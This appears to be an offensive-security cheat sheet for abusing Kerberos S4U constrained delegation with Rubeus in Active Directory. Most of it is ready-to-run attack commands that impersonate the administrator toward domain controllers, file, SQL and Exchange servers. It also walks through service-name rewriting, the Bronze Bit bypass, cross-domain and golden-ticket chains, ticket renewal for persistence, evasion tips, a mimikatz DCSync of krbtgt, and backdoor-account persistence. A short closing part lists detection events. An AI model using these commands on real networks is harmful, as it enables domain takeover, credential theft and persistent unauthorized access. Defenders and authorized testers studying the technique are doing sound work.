S4U delegation abuse lets an attacker who holds a delegation-enabled service account's key or TGT obtain service tickets as any domain user that is not protected from delegation, administrators included, which makes it a high-impact privilege escalation and lateral movement technique.
User Impersonation Impersonate any domain user without their credentials
Service Access Gain access to backend services via delegation
Privilege Escalation Escalate from service account to domain admin
Cross-Domain Exploit delegation across domain boundaries
Overview
Perform S4U (Service for User) constrained delegation abuse to impersonate users and obtain service tickets for back-end services. The technique chains the two Kerberos S4U extensions, S4U2Self and S4U2Proxy, against a service account configured for constrained delegation with protocol transition (TrustedToAuthForDelegation), so the only credential required is that account's key or TGT; no credential of the impersonated user is involved.
Basic Syntax
Authentication Methods
Target Configuration
# Core S4U delegation attack
Rubeus.exe s4u [authentication] /impersonateuser:USER /msdsspn:SERVICE [options]
# Common attack pattern
Rubeus.exe s4u /user:svcaccount /rc4:hash /impersonateuser:administrator /msdsspn:cifs/target.domain.com /ptt
# Using existing TGT
/ticket:BASE64_TGT
/ticket:FILE.KIRBI
# Hash authentication
/user:SERVICE_ACCOUNT /rc4:NTLM_HASH
/user:SERVICE_ACCOUNT /aes256:AES_HASH /domain:DOMAIN
# Certificate authentication
/user:SERVICE_ACCOUNT /certificate:CERT.PFX /password:CERT_PASS
# Local domain targeting
/impersonateuser:target_user /msdsspn:service/server.domain.com
# Cross-domain targeting
/impersonateuser:admin /msdsspn:cifs/server.remote.com /targetdomain:remote.com /targetdc:dc.remote.com
# Alternative service exploitation
/msdsspn:http/web.domain.com /altservice:cifs,host,ldap
Core Parameters
Authentication Options
Advanced Options
Authentication & Impersonation
Service Account Details
/user: service account configured for delegation. Requirements:
Constrained delegation with protocol transition (TrustedToAuthForDelegation); without it the S4U2Self ticket comes back non-forwardable and S4U2Proxy fails on a patched KDC (RBCD back-ends are the exception, because the KDC accepts a non-forwardable S4U2Self ticket there)
Target SPN present in the account's msDS-AllowedToDelegateTo list
The account's RC4/AES key, a certificate, or an existing TGT
Discovery Commands: # Find accounts with protocol transition enabled
Get-ADUser -Filter {TrustedToAuthForDelegation -eq $true} -Properties msDS-AllowedToDelegateTo
Target User Selection
/impersonateuser: user to impersonate via delegation. High-Value Targets:
administrator - Built-in admin account
domain admins - Members of Domain Admins
service accounts - High-privilege service accounts
computer accounts - Machine accounts (e.g. DC01$), useful where the target trusts the machine identity
Notes:
No password or hash of the impersonated user is needed; only the service account's key or TGT
Any user can be named, but the KDC issues a non-forwardable S4U2Self ticket for members of Protected Users and for accounts flagged "Account is sensitive and cannot be delegated", so S4U2Proxy fails for them on a patched KDC
Check both protections before choosing a target; a failed attempt still produces a 4769 event on the DC
Delegation Target Service
/msdsspn: Service Principal Name of the delegation target. Format: service/hostname.domain.com[:port]
Common Patterns:
cifs/fileserver.corp.local - File services
http/web.corp.local - Web applications
MSSQLSvc/sql.corp.local:1433 - Database
ldap/dc.corp.local - Directory services
host/server.corp.local - Administrative access
Discovery: the SPN must appear verbatim in the service account's msDS-AllowedToDelegateTo list; the KDC matches the whole string, so a short name and an FQDN are distinct entries
Hash-Based Authentication
NTLM Hash Authentication
/rc4: NTLM hash of the service account. Format: 32-character hexadecimal string
Example: 32ed87bdb5fdc5e9cba88547376818d4
Acquisition Methods:
DCSync (replication of the account's secrets from a DC)
LSASS or LSA secrets dumping on a host where the service runs
Kerberoasting (crack the service ticket, then derive the NT hash from the recovered password)
Credentials captured from configuration files, scripts or network captures
AES256 Key Authentication
/aes256: AES256-CTS-HMAC-SHA1-96 key of the service account. Advantages:
Avoids the RC4 (etype 0x17) tickets that stand out in events 4768/4769 when the account supports AES
Matches what a current Windows client negotiates
Works for accounts whose msDS-SupportedEncryptionTypes excludes RC4
Acquisition: DCSync (returns the AES keys alongside the NT hash) or extraction from LSASS on a host where the service account has logged on
TGT-Based Authentication
Existing TGT for service account Formats:
Base64-encoded ticket data
.kirbi file path
Sources:
Extracted with Rubeus dump on a host where the service account has a logon session (elevation required to read other sessions)
Golden ticket attacks
Legitimate authentication
Service Manipulation
Alternative Service Targeting
/altservice: service class(es) to substitute in the final ticket. The service name (sname) sits in the unencrypted part of a Kerberos ticket and the KDC does not bind it to the encrypted part, so a ticket obtained for one SPN can be rewritten to any other SPN whose key is the same account, normally every service class registered on the target host's computer account:
cifs,host - File shares and administrative access
http,https - Web services (when IIS runs as the computer account)
ldap,gc - Directory services on a domain controller
rpcss,wsman - RPC and PowerShell remoting
Multi-Service Targeting: /altservice:cifs,host,http,ldap
Caveat: the substitution only works toward the same host, and only when the listed SPN belongs to that host's computer account; an MSSQLSvc SPN registered on a dedicated SQL service account yields a ticket encrypted with that account's key, which no host/ or cifs/ service on the box will accept
Use Cases:
Expand delegation scope
Access related services
Maximize attack surface
/bronzebit - Apply the Bronze Bit technique (CVE-2020-17049): set the forwardable flag on the S4U2Self ticket before S4U2Proxy; only effective against a KDC without the November 2020 fix, and needs the account key (/rc4 or /aes256), not just a TGT
/nopac - Request the S4U tickets without a PAC (paired with /bronzebit in the examples below)
/self - Execute S4U2Self only and return that ticket (forwardable when the account has protocol transition and the user is not protected from delegation)
Cross-Domain Configuration
Cross-Domain Targeting
/targetdomain: domain of the back-end service. Requirements:
Trust between the service account's domain and the target domain
Classic constrained delegation (msDS-AllowedToDelegateTo) only covers back-end services in the service account's own domain; a back-end in another domain has to trust the front-end through resource-based constrained delegation (msDS-AllowedToActOnBehalfOfOtherIdentity on the back-end account)
Network connectivity to a domain controller of the target domain
Trust Types:
Parent-child trusts (two-way, transitive)
Forest trusts (RBCD can be configured across them)
External trusts (non-transitive; selective authentication can block the service account entirely)
Target Domain Controller
/targetdc: domain controller of the target domain that receives the cross-domain requests. Selection Criteria:
Reachable on TCP 88 from the attacking host
Any DC of the target domain serves as KDC; prefer the one the service account normally contacts (OPSEC)
/opsec - Mimic a legitimate Windows client's request pattern where Rubeus supports it
/ptt - Inject the final ticket into the current logon session (recommended)
/outfile - Write the ticket to a .kirbi file
/createnetonly - Start a network-only (logon type 9) process and inject the ticket into it
Basic Delegation: Hash and TGT Authentication
# Service account to file server
Rubeus.exe s4u /user:svc_web /rc4:32ed87bdb5fdc5e9cba88547376818d4 /impersonateuser:administrator /msdsspn:cifs/fileserver.corp.local /ptt
# Service account to database
Rubeus.exe s4u /user:svc_app /aes256:b982a9a15bc34fd3ccfb18041095b5394a7c6a0a9f2e02c3d6b8d86a59a73f02 /impersonateuser:administrator /msdsspn:MSSQLSvc/sql01.corp.local:1433 /ptt
# Service account to domain controller
Rubeus.exe s4u /user:svc_backup /rc4:hash /impersonateuser:administrator /msdsspn:ldap/dc01.corp.local /ptt
Service Escalation: Alternative Service Attacks and Privilege Escalation Chains
# HTTP delegation to file access
Rubeus.exe s4u /user:svc_web /rc4:hash /impersonateuser:administrator /msdsspn:http/web01.corp.local /altservice:cifs /ptt
# Database delegation to administrative access (works only when the SQL service runs as the computer account, so the MSSQLSvc ticket is encrypted with the machine key)
Rubeus.exe s4u /user:svc_sql /aes256:key /impersonateuser:administrator /msdsspn:MSSQLSvc/sql.corp.local:1433 /altservice:host /ptt
# Multi-service targeting
Rubeus.exe s4u /user:svc_app /rc4:hash /impersonateuser:administrator /msdsspn:host/server.corp.local /altservice:cifs,http,ldap,rpcss /ptt
Cross-Domain Attacks: Parent-Child and Forest Trusts
# Child to parent domain
Rubeus.exe s4u /user:svc_web /rc4:hash /domain:child.corp.local /impersonateuser:administrator /msdsspn:cifs/fileserver.corp.local /targetdomain:corp.local /targetdc:dc01.corp.local /ptt
# Parent to child domain
Rubeus.exe s4u /user:svc_app /aes256:key /domain:corp.local /impersonateuser:administrator /msdsspn:http/web.child.corp.local /targetdomain:child.corp.local /ptt
Advanced Techniques: Bronze Bit Attacks
# Standard Bronze Bit
Rubeus.exe s4u /user:svc_web /rc4:hash /impersonateuser:administrator /msdsspn:http/web.corp.local /bronzebit /nopac /ptt
# Bronze Bit with service alternation
Rubeus.exe s4u /user:svc_app /aes256:key /impersonateuser:administrator /msdsspn:host/server.corp.local /altservice:cifs /bronzebit /nopac /ptt
# Cross-domain Bronze Bit
Rubeus.exe s4u /user:svc_db /rc4:hash /domain:child.corp.local /impersonateuser:administrator /msdsspn:MSSQLSvc/db.parent.corp:1433 /targetdomain:parent.corp /bronzebit /nopac
Integration Workflows: Discovery to Exploitation and Persistence
# 1. Find delegation-enabled accounts
# PowerShell: Get-ADUser -Filter {TrustedToAuthForDelegation -eq $true}
# 2. Request a TGT with the recovered service account hash and save it
Rubeus.exe asktgt /user:svc_found /rc4:discovered_hash /outfile:svc.kirbi
# 3. Perform delegation attack
Rubeus.exe s4u /ticket:svc.kirbi /impersonateuser:administrator /msdsspn:discovered_spn /ptt
# 4. Verify access
Rubeus.exe klist
S4U Protocol Flow
S4U2Self Phase
S4U2Proxy Phase
Service Access
Request Service → KDC
Service requests TGS for itself
On behalf of target user
Ticket is forwardable only when the service has protocol transition (TrustedToAuthForDelegation) and the user is not protected from delegation
Uses service account credentials
Response KDC → Service
Returns forwardable TGS
Ticket marked for delegation
Contains user’s identity
Ready for S4U2Proxy
Technical Details:
Service authenticates with its own credentials
Requests ticket “for” another user
No user credentials required
Results in a service ticket for the service itself, forwardable under the conditions above
Delegation Request Service → KDC
Uses forwardable TGS from S4U2Self
Requests access to backend service
Must be in delegation configuration
Impersonates target user
Service Ticket KDC → Service
Returns service ticket for backend
Ticket for target user identity
Access to configured service only
Ready for service authentication
Security Controls:
msDS-AllowedToDelegateTo restricts the back-end SPNs
The KDC requires the S4U2Self ticket to be forwardable (since the CVE-2020-17049 fix it verifies the flag it set itself rather than trusting the bits in the presented ticket)
Members of Protected Users and "cannot be delegated" accounts never receive forwardable S4U2Self tickets
Time-limited ticket validity (10 hours by default)
Final phase where the delegated service ticket is used for actual service access
Access Patterns:
Present service ticket to backend service
Authenticate as impersonated user
Gain user’s privileges on target service
Service sees “legitimate” user access
Attack Value:
No user credentials needed
Full user privilege inheritance
Transparent to target service
Potential for privilege escalation
Delegation Types
Unconstrained Delegation
Constrained Delegation
Resource-Based (RBCD)
Unconstrained delegation provides the highest attack surface and risk
Characteristics:
Service can delegate to ANY service
Stores user’s TGT for reuse
No restrictions on delegation targets
Legacy configuration pattern
Attack Implications:
Complete user impersonation capability
Access to any domain service
TGT extraction opportunities
High privilege escalation potential
Detection: userAccountControl contains TRUSTED_FOR_DELEGATION (524288)
Traditional KCD Configuration:
Service account property
msDS-AllowedToDelegateTo attribute
Explicit SPN list
“Trust this computer for delegation” setting
Limitations:
Only to configured services
Requires service account privileges
Administrator-controlled configuration
Protocol Transition (TrustedToAuthForDelegation):
Lets the service obtain a forwardable S4U2Self ticket for any user without that user ever authenticating with Kerberos (intended for front ends that accept forms, NTLM or certificate logons)
Exactly what Rubeus s4u /impersonateuser relies on; Kerberos-only constrained delegation needs the user's own forwardable ticket and cannot be driven from the service key alone
Attack Surface:
Any user not protected from delegation can be impersonated toward the listed SPNs
Combined with /altservice, every service class of the listed hosts
Resource-Based Constrained Delegation reverses the control model
Key Differences:
The back-end resource decides who may delegate to it (msDS-AllowedToActOnBehalfOfOtherIdentity on the resource's account)
Configurable by anyone with write access to that attribute, not only domain admins
Works across domains and forests
The KDC accepts a non-forwardable S4U2Self ticket in S4U2Proxy, so protocol transition is not needed on the front end
Attack Vectors:
Create a computer account (MachineAccountQuota, default 10) to act as the front end
Write the attribute on a target computer object whose ACL you control (GenericWrite, WriteDACL, owner)
Exploit weak ACL permissions
Discovery Commands: # Find RBCD configurations
Get-ADComputer -Filter * -Properties msDS-AllowedToActOnBehalfOfOtherIdentity | Where-Object { $_.'msDS-AllowedToActOnBehalfOfOtherIdentity' -ne $null }
Configuration Requirements
Service Account Prerequisites
Required Privileges:
None on the local host for the Kerberos exchange: Rubeus builds the S4U2Self and S4U2Proxy requests itself and sends them to the KDC over TCP 88, so only the service account's key or TGT is needed
(Native S4U logons through LsaLogonUser would need SeTcbPrivilege, which is why the attack is driven with raw Kerberos messages instead)
/ptt into another logon session (/luid) and Rubeus dump require local administrator rights
Delegation Configuration:
TrustedToAuthForDelegation set on the service account
Target SPNs listed in msDS-AllowedToDelegateTo
SPN registered on the back-end account (the KDC must be able to resolve it)
Domain functional level 2003 or later (S4U extensions)
Security Boundaries:
Protected Users group (members cannot be delegated)
"Account is sensitive and cannot be delegated" flag
Classic KCD limited to the service account's own domain; cross-domain needs RBCD
Ticket lifetime (10 hours by default; TGTs renewable for 7 days)
Prerequisites
Discovery Commands
Assessment Matrix
Service Account Compromise
Credential Requirements Required Access:
Service account password hash (RC4/AES)
Valid TGT for service account
Certificate-based authentication
Kerberos ticket extraction
Configuration Validation Verification Steps:
Account has delegation configuration
Target services in delegation list
Proper privilege assignments
Domain controller accessibility
Credential Acquisition Methods:
Kerberoasting service account
DCSync for password hashes
Memory extraction (dump, lsass)
Golden ticket with service account
Delegation Discovery
Account Enumeration: # Find all delegation-enabled accounts
Get-ADUser -Filter {TrustedToAuthForDelegation -eq $true} -Properties servicePrincipalName,msDS-AllowedToDelegateTo
# Include computer accounts
Get-ADComputer -Filter {TrustedToAuthForDelegation -eq $true} -Properties servicePrincipalName,msDS-AllowedToDelegateTo
# Find unconstrained delegation
Get-ADUser -Filter {TrustedForDelegation -eq $true}
Service Validation:
Verify SPN registration
Check delegation target list
Validate service accessibility
Test network connectivity
Target Assessment
High-Value Targets:
Domain controllers (LDAP, GC)
File servers (CIFS)
Database servers (MSSQLSvc)
Web applications (HTTP/HTTPS)
Administrative services (HOST)
Privilege Analysis:
Administrative service access
Cross-domain delegation
Service account privileges
Delegation scope assessment
PowerShell Enumeration
LDAP Queries
Network Analysis
# Comprehensive delegation discovery
Get-ADUser -Filter {TrustedForDelegation -eq $true -or TrustedToAuthForDelegation -eq $true} -Properties TrustedForDelegation,TrustedToAuthForDelegation,servicePrincipalName,msDS-AllowedToDelegateTo | Format-Table Name,TrustedForDelegation,TrustedToAuthForDelegation,msDS-AllowedToDelegateTo
# Find computer accounts with delegation
Get-ADComputer -Filter {TrustedForDelegation -eq $true -or TrustedToAuthForDelegation -eq $true} -Properties TrustedForDelegation,TrustedToAuthForDelegation,servicePrincipalName,msDS-AllowedToDelegateTo
# Resource-based constrained delegation
Get-ADComputer -Filter * -Properties msDS-AllowedToActOnBehalfOfOtherIdentity | Where-Object { $_.'msDS-AllowedToActOnBehalfOfOtherIdentity' -ne $null }
Delegation Risk Assessment
Account Type       Delegation Type       Risk Level   Attack Complexity   Impact
Service Account    Unconstrained         Critical     Low                 Domain Admin
Service Account    Constrained           High         Medium              Service Access
Computer Account   RBCD                  High         Medium              Local Admin
User Account       Protocol Transition   Medium       High                User Privileges
Target Prioritization:
Critical Services: Domain controllers, Exchange, SQL
Administrative Services: File servers, management tools
Application Services: Web apps, databases
Infrastructure Services: DNS, DHCP, monitoring
Attack Feasibility:
Service account credential difficulty
Network accessibility to targets
Delegation configuration scope
Defensive tool presence
Service Categories
Service Equivalence
Target Selection
Infrastructure Services Domain Controllers:
ldap/dc.corp.local - Directory services
gc/dc.corp.local - Global catalog
dns/dc.corp.local - DNS services
host/dc.corp.local - Administrative access
Critical Impact: Domain admin equivalent access
File Services File Servers:
cifs/fileserver.corp.local - SMB shares
nfs/fileserver.corp.local - NFS shares
host/fileserver.corp.local - Admin access
Access Scope: File system, administrative shells
Database Services SQL Servers:
MSSQLSvc/sql.corp.local:1433 - SQL Server
oracle/db.corp.local:1521 - Oracle
mysql/db.corp.local:3306 - MySQL
Privilege Escalation: Database admin, OS access
Web Services Application Servers:
http/web.corp.local - Web applications
https/web.corp.local - Secure web
ws/web.corp.local - Web services
Attack Surface: Application admin, IIS access
Service Class Relationships
Administrative Service Classes
HOST Service Class:
HOST is an alias class: Windows maps many service classes (cifs, http, rpcss, wsman and others, per the sPNMappings attribute in the forest configuration) to host/<fqdn> when no explicit SPN exists, so the computer account holds the key for all of them
If host/server is in the delegation list, the ticket can be rewritten with /altservice to any service class on that host because the encryption key is the same
Often configured for delegation because administrators delegate to the whole computer
Equivalent Services (same host, same computer account key):
host/server = Administrative access
cifs/server = File system access
rpcss/server = RPC service access
wsman/server = PowerShell remoting
Attack Strategy: # Delegation to host service
/msdsspn:host/server.corp.local
# Rewrite to the same host's other services with /altservice:
# - cifs: file shares (C$, ADMIN$)
# - rpcss: RPC and service control
# - wsman: PowerShell remoting
# - host: service management (PsExec-style)
Cross-Service Exploitation
Web to File Scenario: HTTP delegation to file access
/msdsspn:http/web.corp.local /altservice:cifs
Result: Web app access → File system access
Database to Admin Scenario: SQL delegation to administrative access (only when the SQL service runs as the computer account)
/msdsspn:MSSQLSvc/sql.corp.local:1433 /altservice:host
Result: Database access → Full administrative control
Multi-Service Targeting
Maximize Attack Surface: # Target multiple related services
/msdsspn:http/server.corp.local /altservice:cifs,host,ldap,rpcss
# Database to everything (requires the MSSQLSvc SPN to be registered on the computer account)
/msdsspn:MSSQLSvc/sql.corp.local:1433 /altservice:host,cifs,http,rpcss
# Administrative delegation expansion
/msdsspn:host/server.corp.local /altservice:cifs,http,ldap,dns,rpcss
Service Priority:
host - Maximum administrative access
cifs - File system access
ldap - Directory service access
rpcss - RPC service management
http - Web application access
High-Value Targets
Domain Controllers:
ldap/dc01.corp.local - Primary DC
ldap/dc02.corp.local - Secondary DC
gc/dc01.corp.local - Global catalog
Attack Value: Domain admin equivalent access
File Servers:
cifs/shares.corp.local - Primary file server
cifs/backup.corp.local - Backup server
cifs/archive.corp.local - Archive server
Attack Value: Data access, credential harvesting
Infrastructure Servers
Management Servers:
host/sccm.corp.local - SCCM server
host/wsus.corp.local - Update server
host/monitoring.corp.local - Monitoring
Database Servers:
MSSQLSvc/sql01.corp.local:1433 - Production SQL
MSSQLSvc/reporting.corp.local:1433 - Reporting
oracle/erp.corp.local:1521 - ERP system
Web Applications:
http/intranet.corp.local - Corporate intranet
http/portal.corp.local - Employee portal
https/vpn.corp.local - VPN gateway
Targeting Strategy
Reconnaissance:
Enumerate delegation configurations
Map service relationships
Identify high-privilege targets
Assess network accessibility
Prioritization:
Domain controllers (critical)
Administrative servers (high)
Database servers (high)
File servers (medium)
Application servers (medium)
Exploitation Sequence:
Start with configured delegation targets
Use /altservice for expansion
Chain through multiple services
Document successful paths
Bronze Bit (CVE-2020-17049) flips the forwardable flag in the S4U2Self ticket to bypass the KDC's delegation protections
Technique Overview
Core Concept:
The S4U2Self ticket is encrypted with the front-end service's own key, and the forwardable flag lives inside that encrypted part
The attacker already holds that key, so the ticket can be decrypted, the flag set, and the ticket re-encrypted; before the fix the KDC trusted the flag as presented
Bypasses the two controls that make S4U2Self tickets non-forwardable: missing protocol transition (Kerberos-only constrained delegation) and the impersonated user being in Protected Users or marked "cannot be delegated"
Does not bypass msDS-AllowedToDelegateTo: the back-end still has to be in the delegation list (or grant RBCD)
Technical Mechanism:
Service requests an S4U2Self ticket for the target user (issued non-forwardable)
Rubeus decrypts it with the service key, sets forwardable, re-encrypts (/bronzebit)
Uses the modified ticket in S4U2Proxy for a listed SPN
A KDC without the fix issues the back-end ticket
Implementation Requirements
Prerequisites Required Access:
Compromised service account with a delegation list (msDS-AllowedToDelegateTo) but without protocol transition, or a target user protected from delegation
The service account's RC4 or AES key (needed to decrypt and re-encrypt the ticket; a TGT alone is not enough)
Network access to a domain controller
Limitations Environmental Factors:
Fixed by the November 2020 update for CVE-2020-17049; enforcement has been the default since February 2021, after which the KDC rejects the modified ticket
Only unpatched domain controllers remain affected
The flag is not part of the PAC, so PAC signing offers no protection and /nopac is not what makes the technique work
Attack Execution: # Standard Bronze Bit
Rubeus.exe s4u /user:svc_account /rc4:hash /impersonateuser:administrator /msdsspn:cifs/target.corp.local /bronzebit /nopac /ptt
# With service alternation
Rubeus.exe s4u /user:svc_web /aes256:key /impersonateuser:administrator /msdsspn:http/web.corp.local /altservice:cifs,host /bronzebit /nopac /ptt
Target Expansion
What it changes:
Impersonate users the KDC normally refuses to delegate (Protected Users, "sensitive and cannot be delegated")
Abuse Kerberos-only constrained delegation accounts that lack protocol transition
What it does not change: the back-end must still be listed in msDS-AllowedToDelegateTo (or grant RBCD); /altservice still extends the reach to the listed hosts' other services
Strategic Applications: # Domain controller SPN (only if it is in the delegation list)
/msdsspn:ldap/dc01.corp.local /bronzebit /nopac
# Administrative service on a listed host
/msdsspn:host/critical.corp.local /bronzebit /nopac
# Listed HTTP SPN rewritten to the same host's other services
/msdsspn:http/any.corp.local /altservice:cifs,host,ldap /bronzebit /nopac
Trust Relationship Analysis
Parent-Child Trusts Characteristics:
Two-way, transitive trusts created automatically
Same forest, so SID filtering is not enforced between the domains
Cross-domain S4U2Proxy works through RBCD on the back-end; classic msDS-AllowedToDelegateTo does not span domains
Forest-wide implications (Enterprise Admins, configuration partition)
External Trusts Limitations:
Unidirectional options
Limited delegation scope
Authentication boundaries
Selective authentication
Forest Trusts Capabilities:
Cross-forest delegation
Transitive relationships
Global catalog access
Enterprise-wide scope
Trust Discovery: # Enumerate domain trusts
Get-ADTrust -Filter *
nltest /domain_trusts
# Forest trust information
Get-ADForest | Select-Object Domains,ForestMode,GlobalCatalogs
Cross-Domain Attack Execution
Parent-Child Scenarios: # Child to parent delegation
Rubeus.exe s4u /user:svc_child /rc4:hash /domain:child.corp.local /impersonateuser:administrator /msdsspn:cifs/parent-server.corp.local /targetdomain:corp.local /targetdc:dc01.corp.local /ptt
# Parent to child delegation
Rubeus.exe s4u /user:svc_parent /aes256:key /domain:corp.local /impersonateuser:administrator /msdsspn:ldap/child-dc.child.corp.local /targetdomain:child.corp.local /ptt
Forest Trust Exploitation: # Cross-forest delegation
Rubeus.exe s4u /user:svc_internal /rc4:hash /domain:internal.corp /impersonateuser:administrator /msdsspn:cifs/external-server.partner.local /targetdomain:partner.local /targetdc:dc.partner.local
Advanced Cross-Domain Techniques
Golden Ticket Integration: # Forge a TGT for the delegation-enabled service account (Rubeus golden takes the krbtgt key as /rc4 or /aes256; an Enterprise Admins entry in /sids would already grant parent-domain access by itself, so it is not needed for S4U)
Rubeus.exe golden /user:svc_child /domain:child.corp.local /sid:S-1-5-21-child-domain /rc4:krbtgt_hash /outfile:golden.kirbi
# Use the forged TGT in place of the service account's own credentials
Rubeus.exe s4u /ticket:golden.kirbi /impersonateuser:administrator /msdsspn:cifs/parent-server.corp.local /targetdomain:corp.local
Service Account Targeting:
Target service accounts in trusted domains
Exploit cross-domain service relationships
Leverage forest-wide administrative groups
Chain delegation across multiple domains
Delegation-Based Persistence
Renewable Ticket Strategy: # Keep the service account's TGT rather than the delegated service ticket: service tickets expire after 10 hours and Rubeus renew works on TGTs
Rubeus.exe asktgt /user:svc_persist /rc4:hash /outfile:svc_tgt.kirbi
# Renew before expiration (possible until the TGT's renew-till, 7 days by default)
Rubeus.exe renew /ticket:svc_tgt.kirbi /outfile:renewed.kirbi
# Re-run the delegation from the renewed TGT whenever access is needed
Rubeus.exe s4u /ticket:renewed.kirbi /impersonateuser:administrator /msdsspn:cifs/critical.corp.local /ptt
Service Account Rotation:
Identify multiple delegation-enabled accounts
Rotate between different service accounts
Distribute delegation activities
Maintain backup access methods
Stealth Considerations
Operational Security:
Use AES encryption when possible
Avoid bulk delegation activities
Blend with normal service patterns
Implement delays between operations
Detection Evasion: # OPSEC-conscious delegation
Rubeus.exe s4u /user:svc_web /aes256:key /impersonateuser:normaluser /msdsspn:http/web.corp.local /opsec /ptt
# Targeted single-service access
Rubeus.exe s4u /user:svc_app /rc4:hash /impersonateuser:serviceaccount /msdsspn:MSSQLSvc/db.corp.local:1433 /ptt
Delegation Chaining
Multi-Hop Scenarios:
Initial service account compromise
Delegate to intermediate service
Extract credentials from intermediate
Chain to final high-value target
Establish persistent access
Attack Chain Example: # Step 1: Web service to database
Rubeus.exe s4u /user:svc_web /rc4:hash1 /impersonateuser:administrator /msdsspn:MSSQLSvc/db.corp.local:1433 /ptt
# Step 2: Access database, extract service account
# [Database access and credential extraction]
# Step 3: Database service to domain controller
Rubeus.exe s4u /user:svc_db /rc4:hash2 /impersonateuser:administrator /msdsspn:ldap/dc01.corp.local /ptt
Domain Escalation
Lateral Movement
Specialized Scenarios
Service Account Discovery
Target Identification: # Find delegation lists that include directory services
Get-ADUser -Filter {TrustedToAuthForDelegation -eq $true} -Properties msDS-AllowedToDelegateTo | Where-Object { $_.'msDS-AllowedToDelegateTo' -like "*ldap*" -or $_.'msDS-AllowedToDelegateTo' -like "*gc*" }
# Identify domain controller delegation
Get-ADUser -Filter {TrustedToAuthForDelegation -eq $true} -Properties msDS-AllowedToDelegateTo | Where-Object { $_.'msDS-AllowedToDelegateTo' -match "ldap/.*\.corp\.local" }
Service Account Compromise:
Kerberoast delegation-enabled accounts
Target service accounts with DC access
Extract credentials via memory dumps
Golden ticket for service accounts
Domain Controller Access
LDAP Service Targeting # LDAP delegation to DC
Rubeus.exe s4u /user:svc_exchange /rc4:hash /impersonateuser:administrator /msdsspn:ldap/dc01.corp.local /ptt
# Global catalog access
Rubeus.exe s4u /user:svc_app /aes256:key /impersonateuser:administrator /msdsspn:gc/dc01.corp.local /ptt
Result: Directory service administrative access
HOST Service Escalation # Full administrative access
Rubeus.exe s4u /user:svc_backup /rc4:hash /impersonateuser:administrator /msdsspn:host/dc01.corp.local /ptt
# Alternative service expansion
Rubeus.exe s4u /user:svc_web /aes256:key /impersonateuser:administrator /msdsspn:http/dc01.corp.local /altservice:host,cifs,ldap /ptt
Result: Domain admin equivalent access
Verification & Exploitation
Access Confirmation: # Verify delegation success
Rubeus.exe klist
# Test domain admin access
dir \\dc01.corp.local\c$
net user /domain
# DCSync capability
mimikatz "lsadump::dcsync /user:krbtgt"
Persistence Establishment:
Create additional delegation accounts
Extract KRBTGT hash for golden tickets
Add to administrative groups
Deploy backdoor accounts
Service Tier Escalation
Web Tier to Database: # Web service delegation to database
Rubeus.exe s4u /user:svc_web /rc4:hash /impersonateuser:administrator /msdsspn:MSSQLSvc/sql01.corp.local:1433 /ptt
# Alternative database targeting
Rubeus.exe s4u /user:svc_app /aes256:key /impersonateuser:administrator /msdsspn:oracle/erp.corp.local:1521 /ptt
Database to File Services: # Database service to file server
Rubeus.exe s4u /user:svc_sql /rc4:hash /impersonateuser:administrator /msdsspn:cifs/shares.corp.local /ptt
# Multi-target file access
Rubeus.exe s4u /user:svc_db /aes256:key /impersonateuser:administrator /msdsspn:host/fileserver.corp.local /altservice:cifs /ptt
Infrastructure Hopping
Management Server Access: # SCCM server delegation
Rubeus.exe s4u /user:svc_app /rc4:hash /impersonateuser:administrator /msdsspn:host/sccm.corp.local /ptt
# Monitoring system access
Rubeus.exe s4u /user:svc_web /aes256:key /impersonateuser:administrator /msdsspn:http/monitoring.corp.local /altservice:host /ptt
# Backup server targeting
Rubeus.exe s4u /user:svc_sql /rc4:hash /impersonateuser:administrator /msdsspn:cifs/backup.corp.local /ptt
Network Infrastructure:
DNS server delegation
DHCP server access
Network management tools
VPN gateway systems
Multi-Hop Chaining
Attack Chain Example:
Initial Access: Web service account
First Hop: Delegate to database server
Credential Extraction: Database service account
Second Hop: Database to file server
Lateral Expansion: File server to domain controller
Implementation: # Hop 1: Web to Database
Rubeus.exe s4u /user:svc_web /rc4:hash1 /impersonateuser:administrator /msdsspn:MSSQLSvc/db.corp.local:1433 /ptt
# [Extract svc_db credentials from database]
# Hop 2: Database to File Server
Rubeus.exe s4u /user:svc_db /rc4:hash2 /impersonateuser:administrator /msdsspn:cifs/shares.corp.local /ptt
# [Extract additional credentials from file server]
# Hop 3: File Server to Domain Controller
Rubeus.exe s4u /user:svc_backup /rc4:hash3 /impersonateuser:administrator /msdsspn:ldap/dc01.corp.local /ptt
Exchange Server Delegation
High-Privilege Targeting: # Exchange to domain controller
Rubeus.exe s4u /user:svc_exchange /rc4:hash /impersonateuser:administrator /msdsspn:ldap/dc01.corp.local /ptt
# Exchange administrative access
Rubeus.exe s4u /user:svc_app /aes256:key /impersonateuser:administrator /msdsspn:http/exchange.corp.local /altservice:host /ptt
Value Proposition:
Exchange often has broad delegation rights
Access to email data and credentials
Administrative access to mail infrastructure
Potential domain admin escalation path
SQL Server Exploitation
Database Administrative Access: # SQL Server administrative delegation
Rubeus.exe s4u /user:svc_web /rc4:hash /impersonateuser:administrator /msdsspn:MSSQLSvc/sql.corp.local:1433 /ptt
# Multiple SQL server targeting
Rubeus.exe s4u /user:svc_app /aes256:key /impersonateuser:administrator /msdsspn:MSSQLSvc/reporting.corp.local:1433 /altservice:host /ptt
Post-Exploitation:
Database administrative access
Credential extraction from databases
OS-level access via xp_cmdshell
Linked server traversal
Application Server Targeting
SharePoint Delegation: # SharePoint service delegation
Rubeus.exe s4u /user:svc_web /rc4:hash /impersonateuser:administrator /msdsspn:http/sharepoint.corp.local /altservice:host,cifs /ptt
ERP System Access: # SAP/Oracle ERP delegation
Rubeus.exe s4u /user:svc_app /aes256:key /impersonateuser:administrator /msdsspn:oracle/erp.corp.local:1521 /altservice:host /ptt
Business Impact:
Access to business-critical applications
Financial and operational data
Administrative configuration access
Potential for business disruption
Detection Indicators
Monitoring Strategies
Mitigation Controls
S4U delegation abuse generates distinctive patterns on the domain controllers that issue the tickets, all in the Security log
Primary Event IDs:
4769 - Kerberos service ticket was requested (both S4U2Self and S4U2Proxy appear here)
4770 - Kerberos service ticket was renewed
4771 - Kerberos pre-authentication failed (wrong key supplied for the service account)
4768 - Kerberos authentication ticket (TGT) was requested (Rubeus asks for the service account's TGT first when given /user with /rc4 or /aes256)
S4U-Specific Patterns: Event 4769 Analysis:
- S4U2Self: Account Name is the impersonated user, Service Name is the front-end service account itself (e.g. svc_web), Client Address is the host running the tool
- S4U2Proxy: Account Name is the impersonated user, Service Name is the back-end account (logged as the account, e.g. FS01$, not as the SPN), and Transited Services names the front-end service; for ordinary ticket requests this field is "-"
